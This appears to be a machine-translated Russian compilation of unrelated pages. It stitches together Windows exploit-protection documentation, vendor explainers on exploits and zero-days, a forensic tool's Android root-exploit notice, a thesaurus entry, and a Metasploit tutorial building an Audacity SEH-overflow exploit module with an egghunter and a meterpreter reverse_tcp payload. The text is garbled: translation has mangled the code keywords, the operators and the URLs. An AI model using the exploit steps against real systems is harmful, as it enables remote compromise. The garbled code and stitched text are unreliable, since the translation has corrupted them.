Чтобы отключить смягчение последствий, можно -Enable заменить -Disable .To disable mitigations, you can replace -Enable with -Disable. Однако для смягчения последствий на уровне приложений это заставит отключить смягчение только для этого приложения.However, for app-level mitigations, this will force the mitigation to be disabled only for that app.

Если требуется восстановить смягчение до системного по умолчанию, необходимо также включить этот список, как в -Remove следующем примере:If you need to restore the mitigation back to the system default, you need to include the -Remove cmdlet as well, as in the following example:

Set-Processmitigation -Name test.exe -Remove -Disable DEP

В этой таблице перечислены отдельные меры по смягчению последствий (и аудиты при наличии), которые будут использоваться с параметрами -Enable или -Disable параметрами cmdlet.This table lists the individual Mitigations (and Audits, when available) to be used with the -Enable or -Disable cmdlet parameters.

Тип смягченияMitigation typeОбласть примененияApplies toКлючевое слово параметра cmdlet mitigationMitigation cmdlet parameter keywordПараметр cmdlet режима аудитаAudit mode cmdlet parameter
Диспетчерская система потока (CFG)Control flow guard (CFG)Системный и app-levelSystem and app-levelCFG, StrictCFG, SuppressExportsCFG, StrictCFG, SuppressExportsАудит не доступенAudit not available
Предотвращение выполнения данных (DEP)Data Execution Prevention (DEP)Системный и app-levelSystem and app-levelDEP, EmulateAtlThunksDEP, EmulateAtlThunksАудит не доступенAudit not available
Force randomization for images (Mandatory ASLR)Force randomization for images (Mandatory ASLR)Системный и app-levelSystem and app-levelForceRelocateImagesАудит не доступенAudit not available
Рандомизация распределений памяти (Снизу вверх ASLR)Randomize memory allocations (Bottom-Up ASLR)Системный и app-levelSystem and app-levelBottomUp, HighEntropyBottomUp, HighEntropyАудит не доступенAudit not available
Проверка цепочек исключений (SEHOP)Validate exception chains (SEHOP)Системный и app-levelSystem and app-levelSEHOP, SEHOPTelemetrySEHOP, SEHOPTelemetryАудит не доступенAudit not available
Проверка целостности кучиValidate heap integrityСистемный и app-levelSystem and app-levelTerminateOnErrorАудит не доступенAudit not available
Произвольный охранник кода (ACG)Arbitrary code guard (ACG)Только на уровне приложенийApp-level onlyDynamicCodeAuditDynamicCode
Блокировка изображений с низкой целостностьюBlock low integrity imagesТолько на уровне приложенийApp-level onlyBlockLowLabelAuditImageLoad
Блокировка удаленных изображенийBlock remote imagesТолько на уровне приложенийApp-level onlyBlockRemoteImagesАудит не доступенAudit not available
Блокировка ненарушимого шрифтаBlock untrusted fontsТолько на уровне приложенийApp-level onlyDisableNonSystemFontsAuditFont, FontAuditOnlyAuditFont, FontAuditOnly
Охрана целостности кодаCode integrity guardТолько на уровне приложенийApp-level onlyBlockNonMicrosoftSigned, AllowStoreSignedBlockNonMicrosoftSigned, AllowStoreSignedAuditMicrosoftSigned, AuditStoreSignedAuditMicrosoftSigned, AuditStoreSigned
Отключение точек расширенияDisable extension pointsТолько на уровне приложенийApp-level onlyExtensionPointАудит не доступенAudit not available
Отключение вызовов системы Win32kDisable Win32k system callsТолько на уровне приложенийApp-level onlyDisableWin32kSystemCallsAuditSystemCall
Не разрешайте детские процессыDo not allow child processesТолько на уровне приложенийApp-level onlyDisallowChildProcessCreationAuditChildProcess
Фильтрация адресов экспорта (EAF)Export address filtering (EAF)Только на уровне приложенийApp-level onlyEnableExportAddressFilterPlus, EnableExportAddressFilter [ 1 ] EnableExportAddressFilterPlus, EnableExportAddressFilter [1]Аудит не доступен [ 2 ] Audit not available[2]
Фильтрация адресов импорта (IAF)Import address filtering (IAF)Только на уровне приложенийApp-level onlyEnableImportAddressFilterАудит не доступен [ 2 ] Audit not available[2]
Имитация выполнения (SimExec)Simulate execution (SimExec)Только на уровне приложенийApp-level onlyEnableRopSimExecАудит не доступен [ 2 ] Audit not available[2]
Проверка вызова API (CallerCheck)Validate API invocation (CallerCheck)Только на уровне приложенийApp-level onlyEnableRopCallerCheckАудит не доступен [ 2 ] Audit not available[2]
Проверка использования ручкиValidate handle usageТолько на уровне приложенийApp-level onlyStrictHandleАудит не доступенAudit not available
Проверка целостности зависимостей изображенийValidate image dependency integrityТолько на уровне приложенийApp-level onlyEnforceModuleDepencySigningАудит не доступенAudit not available
Проверка целостности стека (StackPivot)Validate stack integrity (StackPivot)Только на уровне приложенийApp-level onlyEnableRopStackPivotАудит не доступен [ 2 ] Audit not available[2]

[ 1. ] Используйте следующий формат, чтобы включить модули EAF для DLLs для процесса:[1]: Use the following format to enable EAF modules for DLLs for a process:

Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll

[ 2. ] Аудит для этого смягчения не доступен с помощью cmdlets PowerShell.[2]: Audit for this mitigation is not available via PowerShell cmdlets.

Настройка уведомленияCustomize the notification

Дополнительные сведения о настройке уведомления при запуске правила и блокировке приложения или файла см. в статье Windows Security.See the Windows Security article for more information about customizing the notification when a rule is triggered and blocks an app or file.

См. такжеSee also

Что такое эксплойты и как от них защититься

Что такое эксплойты?

На стадии разработки во все программы и сети встраиваются механизмы защиты от хакеров по типу замков, предупреждающих несанкционированные посягновения извне. Уязвимость же похожа на открытое окно, пробраться через которое не составит большого труда для злоумышленника. В случае с компьютером или сетью злоумышленники могут установить вредоносное ПО, воспользовавшись уязвимостью, с целью получить контроль или инфицировать систему в своих корыстных целях с соответствующими последствиями. Чаше всего все это происходит без ведома пользователя.

Как возникают эксплойты?

Эксплойты вызываются ошибками в процессе разработки программного обеспечения, в результате которых в системе защиты программ оказываются уязвимости, которые успешно используются киберпреступниками для получения неограниченного доступа к самой программе, а через нее дальше — ко всему компьютеру. Эксплойты классифицируются в соответствии с типом уязвимости, которая используется хакером: нулевого дня, DoS, спуфинг или XXS. Разумеется, разработчики программ в скором времени выпустят обновления безопасности с целью устранения найденных дефектов, однако до этого момента программа является по-прежнему уязвимой для злоумышленников.

Как распознать эксплойт?

Так как эксплойты используют бреши в механизмах безопасности программ, у рядового пользователя практически нет шансов определить их наличие. Именно поэтому чрезвычайно важно поддерживать установленные программы обновленными, в особенности своевременно устанавливать обновления безопасности, выпускаемые разработчиками программ. В случае, если разработчик ПО выпустит обновление безопасности для устранения известной уязвимости в своем ПО, но пользователь не установит его, то, к сожалению, программа не получит необходимые самые последние вирусные определения.

Как устранить эксплойт?

Ввиду того, что эксплойты являются последствием совершенных недочетов, их устранение входит в прямые обязанности разработчиков, поэтому именно авторы должны будут подготовить и разослать исправление ошибок. Тем не менее, обязанность поддерживать установленные программы обновленными и своевременно устанавливать пакеты обновлений, чтобы не дать хакерам шансов воспользоваться уязвимостями, лежит полностью на пользователе программы. Одним из возможных способов не пропустить самые свежие обновления — использовать менеджер приложений, который позаботится о том, чтобы все установленные программы были обновлены, или — что еще лучше — воспользоваться инструментом автоматического поиска и установки обновлений.

Как пресечь попытки хакеров воспользоваться уязвимостями сторонних программ
  • Убедитесь, что вы установили самые свежие обновления безопасности и патчи для всех программ
  • Чтобы быть в безопасности онлайн и оставаться в курсе событий, устанавливайте все обновления сразу после их выпуска
  • Установите и используйте антивирус класса премиум, который способен автоматически обновлять установленные программы
Обезопасьте себя от эксплойтов

Полагайтесь на здравый смысл и следуйте базовым правилам безопасной работы в Интернете. Хакеры могут воспользоваться уязвимостью только в том случае, если им удастся получить доступ к вашему ПК. Не открывайте вложения в подозрительных сообщениях и не загружайте файлы из неизвестных источников. Поддерживайте установленные программы обновленными, а также своевременно устанавливайте обновления безопасности. Если хотите максимально упростить эту задачу, скачайте антивирус Avast, который не только обеспечит надежную защиту от всех типов вредоносного ПО, но и поможет с установкой самых свежих обновлений для сторонних программ.

Для кого баг, а для кого фича

В крайнем обновлении программы «Мобильный Криминалист» мы добавили поддержку root-эксплойтов, основанных на уязвимостях  CVE 2019-2215 и CVE 2018-9568. Рассмотрим их подробнее.

CVE 2019-2215 

Дата появления:  2019

Статус: High Severity

Описание: Эксплойт, основанный на CVE-2019-2215, является бесплатным для использования и позволяет полностью скомпрометировать уязвимое устройство. 

На чем основан: Эксплойт создан на уязвимости, найденной 3 октября 2019 года проектом Google Zero в коде ядра Android-устройств, выпущенных до апреля 2018 года.

Характеристика устройств: ОС Android 8 и выше, процессор arm64-8va, ядро 3.18 или 4.4, обновление безопасности до октября 2019 года.

Особенности:  6 октября 2019 года были добавлены обновления в октябрьский бюллетень безопасности Android, закрывающие брешь CVE-2019-2215. Однако этот эксплойт можно использовать до сих пор на устройствах с обновлением системы безопасности до вышеуказанной даты. 

CVE 2018-9568

Дата появления: 2018

Статус: High Severity

Описание: Эксплойт создан на уязвимости компонентов ядра, которая позволяет получить повышенные привилегии в системе, вызванные ошибкой преобразования типов данных.

На чем основан: Эксплойт основан на уязвимости ядра, известной как WrongZone. 

Характеристика устройств: ОС Android 7 и ниже, процессор arm64, обновление безопасности до декабря 2018 года.

Особенности: Компания Google уже устранила уязвимость, но эксплойт до сих пор можно использовать, если на устройстве стоит обновление безопасности до декабря 2018 года.

Для того, чтобы воспользоваться этими эксплойтами для получения root-доступа в нашем ПО «Мобильный Криминалист» требуется: 

  • запустить модуль  «Мастер извлечения данных»;
  • выбрать «Физический дамп Android ( через ADB)»;
  • подключить устройство, следуя инструкциям;  
  • выбрать эксплоит в окне «Опции извлечения». 


 

Упомянутые эксплойты позволяют получить права суперпользователя на устройстве и извлечь его полный физический образ, что открывает новые возможности в мире мобильной криминалистики в отношении работы со смартфонами на операционной системе Android различных версий. 

эксплойт — определение

Эксплойт — это код, который использует уязвимость программного обеспечения или недостаток безопасности. Он написан либо исследователями безопасности как доказательная угроза, либо злоумышленниками для использования в своих операциях. При использовании эксплойты позволяют злоумышленнику получить удаленный доступ к сети и получить повышенные привилегии или проникнуть глубже в сеть.

В некоторых случаях эксплойт может использоваться как часть многокомпонентной атаки. Вместо использования вредоносного файла эксплойт может использовать другое вредоносное ПО, которое может включать в себя троянов-бэкдоров и шпионское ПО, которое может украсть информацию о пользователях из зараженных систем.


Эксплойты нулевого дня и комплекты эксплойтов

Основываясь на популярном использовании терминов эксплойтов, эксплойт называется эксплойтом нулевого дня, когда он используется для атаки на уязвимость, которая была идентифицирована, но еще не исправлена, также известная как уязвимость нулевого дня.

Эксплойты часто включаются в вредоносные программы, что позволяет им распространять и запускать сложные процедуры на уязвимых компьютерах. Наборы эксплойтов популярны в киберпреступном подполье, поскольку они предоставляют консоли управления, набор эксплойтов, нацеленных на различные приложения, и несколько дополнительных функций, облегчающих запуск атаки.Впервые они были предложены в российском андерграунде в 2006 году.

Развитие эксплойтов

2006 г. и ранее

  • Червь Blaster использовался для эксплуатации сетевых уязвимостей в 2003 году.
  • Бот-черви быстрее всего адаптировались к недавно опубликованным эксплойтам.
  • Уязвимость метафайла Windows (WMF) обозначила тенденцию использования эксплойтов, нацеленных на уязвимости на стороне клиента, для внедрения вредоносных программ в уязвимые системы.

2007

  • Эксплойты были разработаны для нацеливания на уязвимости программного обеспечения в широко используемых приложениях, например мультимедийные плееры, офисные приложения и программы безопасности.

2008

  • Киберпреступники искали уязвимости для использования с помощью автоматизированных инструментов, нацеленных на плохо настроенные страницы и сайты.
  • SQL-инъекция, межсайтовые сценарии и другие уязвимости веб-приложений стали преобладающими.

2009

  • Настроенные атаки были широко распространены и были нацелены на несколько конкретных платформ. Киберпреступники сделали обнаружение браузеров и ОС частью атак и разрешили запускать эксплойты на целевых платформах.
  • Киберпреступники нацелились на уязвимости в мобильных приложениях.

2010

  • Взломанные веб-сайты и атаки с проезжей части стали преобладающими.
  • Stuxnet использовал эксплойты уязвимостей как часть своей программы против систем SCADA.

2011

  • Массовые атаки с использованием SQL-инъекций нацелены на миллионы веб-страниц, включая ASP.NET-сайтов.
  • Было обнаружено несколько новых приложений, использующих уязвимости мобильных устройств.

2012

  • Киберпреступники усовершенствовали комплект Blackhole Exploit Kit, который использовался в ряде фишинговых кампаний.
  • Java стала самой целевой программой для наборов эксплойтов, что побудило индустрию информационной безопасности подтолкнуть к сокращению ее использования.

2013

  • «Устаревшее» программное обеспечение или программное обеспечение, которое больше не получало поддержки от своих поставщиков, были зрелыми целями для эксплойтов в 2013 году, поражая программное обеспечение Plesk старше Parallels Plesk Panel 9.5 и Java 6.

2014

  • Было обнаружено несколько уязвимостей в средах с открытым исходным кодом, включая Shellshock, Heartbleed и Poodle

2015

  • Взлом Hacking Team привел к обнаружению нескольких уязвимостей нулевого дня в Adobe, Windows и Java.
  • Эти же уязвимые платформы также стали мишенью для других атак нулевого дня в Pawn Storm — длительной кампании кибершпионажа, которую мы отслеживаем с 2014 года.

2016

  • Киберпреступники и исследователи безопасности обнаружили уязвимости в умных устройствах, таких как автомобили, игрушки и домашние системы безопасности.

Устранение уязвимостей

Virtual patching — одно из наиболее рекомендуемых решений по снижению рисков для предприятий.Виртуальное исправление работает в предположении, что эксплойты выбирают определенный путь к приложению и от него, чтобы использовать программный недостаток. Следовательно, можно создавать правила на сетевом уровне, которые могут управлять обменом данными с целевым программным обеспечением. Сканируя трафик на наличие используемых протоколов, вы можете в определенной степени предотвратить выполнение эксплойтами того, что они намеревались сделать.

Связанные термины: Эксплойт-комплект, эксплойт нулевого дня, файлы cookie, взлом, уязвимость, виртуальное исправление, SQL-инъекция, кросс-сторонние сценарии, Интернет вещей

Связанные документы или учебники:

Мониторинг уязвимостей: защищены ли ваши серверы от взлома?

Виртуальная установка исправлений в смешанных средах: как это работает для вашей защиты Инфографика по теме:

Уязвимость Shellshock: основы «Bash Bug»

Остановите смертельные угрозы / Blackhole Exploit Kit

Уклонение от компромисса: взгляд на пробелы в экспозиции

Интернет всего: уровни, протоколы и возможные атаки

Графика:

http: // about-угрозы.trendmicro.com/RelatedThreats.aspx?language=tw&name=Gateways+to+Infection%3A+Exploiting+Software+Vulnerabilities

http://about-threats.trendmicro.com/RelatedThreats.aspx?language=tw&name=Gateways+to+Infection%3A+Exploiting+Software+Vulnerabilities

Ссылки:

http://about-threats.trendmicro.com/RelatedThreats.aspx?language=tw&name=Gateways+to+Infection%3A+Exploiting+Software+Vulnerabilities

https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/exploit-kits-past-present-and-future

http: // blog.trendmicro.com/trendlabs-security-intelligence/monitoring-vulnerabilities-are-your-servers-exploit-proof/

Что такое нулевой день? Определение, примеры и защита

Определение нулевого дня

нулевой день — это недостаток безопасности, для которого поставщик уязвимой системы еще не предоставил исправление для затронутых пользователей. Название в конечном итоге происходит от мира пиратства цифрового контента: если пираты могли распространять контрафактную копию фильма или альбома в тот же день, когда он поступил в продажу на законных основаниях (или, может быть, даже раньше), это называли «нулевым днем».»

Заимствованное из мира кибербезопасности, название вызывает сценарий, в котором злоумышленник атакует поставщика программного обеспечения, реализуя атаки, использующие уязвимость, прежде чем хорошие ребята из информационной безопасности смогут отреагировать. Однажды метод атаки нулевого дня циркулирует в криминальной экосистеме — часто продаваемая их первооткрывателями за большие деньги — время торговцев тикает, чтобы создать и распространить патч, закрывающий дыру.

Уязвимость нулевого дня против эксплойта против атаки

Есть три слова — Уязвимость , эксплойт, и атака — которые вы часто видите связанными с нулевым днем, и понимание различия поможет вам понять жизненный цикл нулевого дня.

Уязвимость нулевого дня — это обнаруженная программная или аппаратная ошибка, для которой не существует исправления. Ключ к открытию — это, без сомнения, ряд недостатков, о которых буквально никто не знает, которые вызывают некоторые философские вопросы в стиле «Что, если дерево упало в лесу, но никто этого не услышал?». Но вопрос , кто знает об этих недостатках, имеет решающее значение для развития инцидентов безопасности. Исследователи безопасности, обнаружившие уязвимость, могут конфиденциально связаться с поставщиком, чтобы можно было разработать исправление до того, как о существовании уязвимости станет широко известно.Тем временем некоторые злоумышленники или хакерские группы, спонсируемые государством, могут захотеть сохранить информацию об уязвимости в секрете, чтобы поставщик оставался в неведении, а дыра оставалась открытой.

В любом случае уязвимость сама по себе является заманчивой целью, но не более того. Чтобы использовать эту уязвимость для получения доступа к системе или ее данным, злоумышленник должен разработать эксплойт нулевого дня — — метод проникновения или вредоносное ПО, которое использует эту уязвимость. В то время как некоторые злоумышленники разрабатывают эти эксплойты для собственного использования, другие продают их по самой высокой цене, а не напрямую пачкают руки.

Вооружившись эксплойтом, злоумышленник теперь может провести атаку нулевого дня . Другими словами, уязвимость представляет собой только потенциальное направление атаки , а эксплойт — это инструмент для выполнения этой атаки; поистине опасна сама атака. Это может стать предметом разногласий в сообществе исследователей безопасности, где уязвимости часто обнаруживаются — а иногда и публикуются — с целью повышения осведомленности и более быстрого исправления.Однако поставщики, чьи уязвимости обнаружены, иногда рассматривают эту уязвимость как саму атаку.

Чем опасны эксплойты нулевого дня?

Поскольку эксплойты нулевого дня представляют собой средство воспользоваться уязвимостью, которую еще предстоит исправить, они представляют собой своего рода «абсолютное оружие» для кибератаки. Хотя почти бесчисленные системы по всему миру взламываются каждый год, печальная правда заключается в том, что в большинстве этих нарушений используются дыры, которые известны специалистам по безопасности и для которых существуют исправления; Атаки успешны отчасти из-за плохой гигиены безопасности со стороны жертв, и организации, которые находятся на вершине своей ситуации с безопасностью, которые, по крайней мере теоретически, должны включать в себя действительно важные цели, такие как финансовые учреждения и правительственные учреждения, будут иметь применили необходимые патчи, чтобы предотвратить подобные нарушения.

Но уязвимость нулевого дня по определению не может быть исправлена. Если уязвимость не получила широкой огласки, потенциальные жертвы могут не обращать внимания на уязвимую систему или программное обеспечение и поэтому могут пропустить сигналы подозрительной активности. Преимущество, которое это дает злоумышленникам, означает, что они могут попытаться сохранить информацию об уязвимости в относительном секрете и использовать эксплойты нулевого дня только против важных целей, поскольку секрет не будет длиться вечно.

Стоит повторить, что в категорию «злоумышленников» здесь входят не только киберпреступники, но и группы, спонсируемые государством.Известно, что и китайские, и американские спецслужбы собирают информацию об уязвимостях нулевого дня, которую они могут использовать в целях шпионажа или кибербезопасности. Одним из наиболее известных примеров этого была уязвимость, обнаруженная в протоколе SMB в Microsoft Windows Агентством национальной безопасности США; Чтобы воспользоваться этим, АНБ разработало код эксплойта EternalBlue, который в конечном итоге был украден злоумышленниками, которые использовали его для создания червя-вымогателя WannaCry.

Когда затронутые организации узнают об уязвимости нулевого дня, они могут оказаться в затруднительном положении, особенно если уязвимость связана с операционной системой или другим широко используемым программным обеспечением: они должны либо принять риск атаки, либо закрыть критически важные аспекты их деятельности.

Защита от атак нулевого дня

Хотя уязвимости и атаки нулевого дня, таким образом, являются чрезвычайно серьезными проблемами, это не означает, что противодействие им невозможно. Способы борьбы с такими атаками можно сгруппировать в две широкие категории: что отдельные организации и их ИТ-отделы могут сделать для защиты своей собственной системы, и что отрасль и сообщество безопасности в целом могут сделать, чтобы сделать среду в целом более безопасной.

Начнем с обсуждения того, что вы и ваша организация можете сделать, чтобы защитить себя.Надеюсь, вы уже соблюдаете правила гигиены безопасности; Хорошая новость заключается в том, что даже если нет исправления для конкретной уязвимости нулевого дня, строгие меры безопасности могут снизить ваши шансы на серьезную угрозу. В блоге Cybriant это разбито на следующие этапы:

  • Практикуйтесь в глубокой защите. Помните, что многие нарушения являются результатом цепочки атак, использующих несколько уязвимостей. Постоянное обновление ваших патчей и осведомленность ваших сотрудников о передовых методах работы может разорвать эту цепочку.Например, серверы вашего центра обработки данных могут быть подвержены уязвимости нулевого дня, но если злоумышленник не сможет взломать ваш современный брандмауэр или убедить ваших пользователей загрузить троян, прикрепленный к фишинговому письму, они не смогут доставить их эксплойт в эту уязвимую систему.
  • Остерегайтесь вторжений. Поскольку вы можете не знать, какую форму примет атака нулевого дня, вам нужно следить за подозрительной деятельностью всех видов. Даже если злоумышленник проникнет в вашу систему через неизвестную вам уязвимость, он оставит явные признаки, когда начнет перемещаться по вашей сети и, возможно, захватывать информацию.Системы обнаружения и предотвращения вторжений предназначены для обнаружения такого рода действий, и продвинутый антивирус может аналогично привязать код к вредоносному ПО на основе своего поведения, даже если он не соответствует ни одной из существующих сигнатур.
  • Заблокируйте свои сети. Любое устройство или сервер в вашей компании теоретически может иметь уязвимость нулевого дня, но маловероятно, что все из них. Сетевая инфраструктура, которая затрудняет переход злоумышленников с компьютера на компьютер и упрощает изоляцию скомпрометированных систем, может помочь ограничить ущерб, который может нанести атака.В частности, вы захотите реализовать контроль доступа на основе ролей, чтобы гарантировать, что злоумышленники не смогут легко добраться до драгоценностей вашей короны.
  • Обязательно сделайте резервную копию. Несмотря на все ваши усилия, атака нулевого дня может вывести из строя некоторые из ваших систем, повредить или стереть ваши данные. Частое резервное копирование гарантирует, что вы сможете быстро оправиться от таких наихудших сценариев.

Но бороться с атаками нулевого дня — это не то, что вам нужно делать в одиночку.Фактически, более широкая экосистема безопасности, которая состоит из всех, от независимых исследователей хакеров в белых шляпах до групп безопасности крупных поставщиков программного и аппаратного обеспечения, заинтересована в обнаружении и устранении уязвимостей нулевого дня до того, как злонамеренные хакеры смогут их использовать.

Это правда, что, как мы уже отметили, отдельные участники в этой экосистеме иногда сталкиваются друг с другом. Если независимый исследователь безопасности связывается с поставщиком с информацией об уязвимости, поставщик может рассматривать их как угрозу, а не как помощь, особенно если исследователь неизвестен группе безопасности поставщика.С другой стороны, исследователи могут разочароваться, если поставщик затянет с исправлением дыры, о которой он был проинформирован, и, таким образом, опубликует информацию об уязвимости нулевого дня до того, как для нее будет готов патч, чтобы разжечь пожар. ноги продавца.

Были предприняты усилия, чтобы помочь этим различным участникам лучше работать вместе, сотрудничать и обмениваться информацией ответственно, а не указывать пальцем друг на друга. Одним из важных способов достижения этой цели являются программы вознаграждений, такие как программа Trend Micro Zero Day Initiative, в рамках которой исследователям в области безопасности, которые ответственно сообщают о недостатках в системе безопасности, выплачиваются денежные вознаграждения.Хотя эти программы, вероятно, не могут сравниться с суммами, которые преступные картели будут выкладывать за эксплойты нулевого дня, они создают стимул держать исследователей в узком и прямом смысле, а также создают институциональную структуру, которая является посредником между хакерами и продавцами в белых шляпах и держит линии сообщений открываются по мере продвижения к патчам.

Одна вещь, в которой поставщики и исследователи в целом согласны, заключается в том, что спонсируемые государством группы, которые хранят информацию об уязвимостях нулевого дня для себя в целях шпионажа, не помогают делу безопасности.После разоблачения АНБ и эксплойта EternalBlue Microsoft выступила с резким заявлением, в котором призвала положить конец «накоплению» уязвимостей правительствами и улучшить обмен информацией.

Примеры атак нулевого дня

Мы уже обсуждали EternalBlue, пример того, как правительство США в течение некоторого времени хранит в секрете эксплойты нулевого дня. Однако, строго говоря, волна атак, начавшаяся с WannaCry, не была атаками нулевого дня, потому что Microsoft выпустила исправление для своей уязвимости SMB незадолго до их начала, хотя многие системы оставались уязвимыми.

Марш уязвимостей и атак нулевого дня неумолим. Вот некоторые из самых заметных событий конца 2020 — начала 2021 года:

Авторские права © 2021 IDG Communications, Inc.

Использовать синонимы, использовать антонимы | Тезаурус Мерриам-Вебстера

1 воспользоваться несправедливым преимуществом
  • тип человека, который эксплуатирует добродушие друга, постоянно отхаркивая его
2 контролировать или использовать в своих интересах хитрые, несправедливые или коварные средства
  • политик более чем готов использовать любую национальную трагедию для политической выгоды
  • обмануть,
  • блеф,
  • cozen,
  • обмануть,
  • обман,
  • бродяга,
  • дурак,
  • чайка,
  • обман,
  • обманщик,
  • малыш,
  • Шанхай,
  • снег,
  • приёмная,
  • трюк
3 ввести в действие или услугу
  • будет обидно, если вы не воспользуетесь своим художественным талантом в полной мере
1 акт заметного мастерства, силы или сообразительности
  • причудливый подвиг гигантского лесоруба Пола Баньяна
2 что-то сделано кем-то
  • Когда-то прославившийся как актер, Джон Уилкс Бут теперь помнят за единственный подвиг , его убийство Линкольна
3 захватывающее или знаменательное событие, которое каждый переживает на собственном опыте
  • мемуары, рассказывающие о трех десятилетиях подвигов в качестве странствующего иностранного корреспондента теленовостей
См. Определение словаря

Завершение эксплойта — Metasploit Unleashed

Завершение эксплойта Egghunter

Это стандартное переполнение SEH.Мы можем заметить, что некоторые из наших пользователей вводят «pop, pop, ret» от нас в стеке. Из снимка экрана следует обратить внимание на то, что мы отправили полезную нагрузку размером 2000 байт, однако кажется, что когда мы возвращаемся в наш буфер, она усекается. У нас есть около 80 байт для нашего шелл-кода (отмечены синим). Мы используем команду Immunity ! Safeseh , чтобы найти незащищенные библиотеки DLL, из которых можно найти обратный адрес.

Переполнение структурированного обработчика исключений (SEH) | Metasploit Unleashed

Мы копируем DLL и ищем комбинацию инструкций POP POP RET, используя msfpescan .

 корень @ kali: ~ # msfpescan -p libfftw3f-3.dll

[libfftw3f-3.dll]
0x637410a9 pop esi; поп-эбп; retn 0x000c
0x63741383 pop edi; поп-эбп; Ret
0x6374144c pop edi; поп-эбп; Ret
0x637414d3 pop edi; поп-эбп; Ret

0x637f597b pop edi; поп-эбп; Ret
0x637f5bb6 pop edi; поп-эбп; ret 

От проверки концепции до эксплуатации

Поскольку мы использовали функцию pattern_create для создания нашего начального буфера, теперь мы можем вычислить длину буфера, необходимую для перезаписи нашего обработчика исключений.

 корень @ kali: / usr / share / metasploit-framework / tools # ./pattern_offset.rb 67413966
178 

Мы соответствующим образом модифицируем наш эксплойт, вводя действительный адрес возврата.

 ['Audacity Universal 1.2', {'Ret' => 0x637410A9}], 

Затем мы настраиваем буфер для перенаправления потока выполнения во время сбоя на наш адрес возврата, перепрыгиваем через него (xEB — это «короткий прыжок») и затем попадаем в буфер точки останова (xCC).

 def эксплойт
    бафф = "\ x41" * 174
    бафф >> "\ xeb \ x06 \ x41 \ x41"
    бафф >> [цель.ret] .pack ('V')
    бафф >> "\ xCC" * 2000
    print_status ("Создание файла '# {datastore [' FILENAME ']}' ...")
    file_create (бафф)
 конец 

Мы снова генерируем наш файл эксплойта, присоединяем Audacity к отладчику и импортируем вредоносный файл. На этот раз SEH должен быть перезаписан нашим адресом — тем, который приведет нас к набору инструкций pop, pop, ret. Мы устанавливаем там точку останова и снова принимаем исключение с помощью shift + F9 и проходим через наш pop pop ret с помощью F8.

Цепь SEH | Metasploit Unleashed

Короткий переход переносит нас по нашему адресу возврата в наш «буфер шеллкода».

Shellcode Egg Hunter | Metasploit Unleashed

И снова у нас очень мало места в буфере для полезной нагрузки. Беглый осмотр памяти показывает, что полная длина буфера находится в куче. Зная это, мы могли бы использовать наше начальное 80-байтовое пространство для выполнения egghunter, который будет искать и находить вторичную полезную нагрузку.

Разработка эксплойтов для охоты за яйцами | Metasploit Unleashed

Внедрить MSF egghunter относительно просто:

 def эксплойт
    hunter = generate_egghunter
    яйцо = охотник [1]
 
    бафф = "\ x41" * 174
    бафф >> "\ xeb \ x06 \ x41 \ x41"
    бафф >> [target.ret] .pack ('V')
    бафф >> "\ x90" * 4
    бафф >> охотник [0]
    бафф >> "\ xCC" * 200
    бафф >> яйцо + яйцо
    бафф >> полезная нагрузка.закодированный
 
    print_status ("Создание файла '# {datastore [' FILENAME ']}' ...")
    file_create (бафф)
 конец 

Последний эксплойт выглядит так:

 ##
# $ Id: audacity1-26.rb 6668 2009-06-17 20:54: 52Z hdm $
##

##
# Этот файл является частью Metasploit Framework и может подлежать
# распространение и коммерческие ограничения. См. Metasploit
# Framework для получения дополнительной информации о лицензировании и условиях использования.
# http: // metasploit.ru / projects / Framework /
##

требуется 'msf / core'

класс Metasploit3> Msf :: Exploit :: Remote

включить Msf :: Exploit :: FILEFORMAT
включить Msf :: Exploit :: Remote :: Egghunter

def инициализировать (информация = {})
super (update_info (информация,
'Name' => 'Audacity 1.2.6 (файл GRO) SEH Overflow.',
'Описание' =>% q {
Audacity подвержен уязвимости, связанной с переполнением буфера, потому что не выполняет адекватную работу.
пограничные проверки данных, предоставленных пользователем.Эта проблема возникает в
Функция String_parse :: get_nonspace_quoted () из lib-src / allegro / strparse.cpp
исходный файл при обработке искаженных файлов .gro
Этот модуль использует стековое переполнение буфера в аудиоредакторе Audacity 1.6.2.
Злоумышленник должен отправить файл жертве, а жертва должна импортировать файл «midi».
},
'License' => MSF_LICENSE,
'Автор' => ['muts & mr_me', 'Мати и Стив'],
'Версия' => '$ Ревизия: 6668 $',
'Ссылки' =>
[
['URL', 'http: // milw0rm.com / exploits / 7634 '],
['CVE', '2009-0490'],
],
'Полезная нагрузка' =>
{
'Space' => 2000,
'EncoderType' => Msf :: Encoder :: Type :: AlphanumMixed,
'StackAdjustment' => -3500,
},
'Платформа' => 'победа',
'Цели' =>
[
['Audacity Universal 1.2', {'Ret' => 0x637410A9}],
],
'Privileged' => ложь,
'DisclosureDate' => '5 января 2009 г.',
'DefaultTarget' => 0))

register_options (
[
OptString.new ('FILENAME', [true, 'Имя файла.', 'auda_eviL.gro']),
], self.class)

конец

def эксплойт
hunter = generate_egghunter
яйцо = охотник [1]
бафф = "\ x41" * 174
                бафф >> "\ xeb \ x08 \ x41 \ x41"
                бафф >> [target.ret] .pack ('V')
бафф >> "\ x90" * 4
                бафф >> охотник [0]
бафф >> "\ x43" * 200
                бафф >> яйцо + яйцо
бафф >> полезная нагрузка.закодированный

print_status ("Создание файла '# {datastore [' FILENAME ']}' ...")

file_create (бафф)

конец

конец 

Мы запускаем последний эксплойт через отладчик, чтобы убедиться, что все в порядке. Мы видим, что egghunter был реализован правильно и работает отлично.

Запуск egghunter | Metasploit Unleashed

Мы генерируем наш последний вооруженный эксплойт:

 msf> смелость поиска
 [*] Поиск в загруженных модулях паттерна «дерзость»...
 
 Эксплойты
 ========
 
 Имя Описание
 ---- -----------
 windows / fileformat / audacity Audacity 1.2.6 (файл GRO) Переполнение SEH.
 
 msf> используйте windows / fileformat / audacity
 msf exploit (audacity)> установить PAYLOAD windows / meterpreter / reverse_tcp
 PAYLOAD => окна / meterpreter / reverse_tcp
 msf exploit (смелость)> показать параметры
 
 Варианты модуля:
 
 Имя Текущая настройка Требуется Описание
 ---- --------------- -------- -----------
 ИМЯ ФАЙЛА auda_eviL.gro да Имя файла.
 OUTPUTPATH ​​/ usr / share / metasploit-framework / data / exploits да Местоположение файла.
 
 
 Параметры полезной нагрузки (windows / meterpreter / reverse_tcp):
 
 Имя Текущая настройка Требуется Описание
 ---- --------------- -------- -----------
 EXITFUNC thread да Метод выхода: seh, thread, process
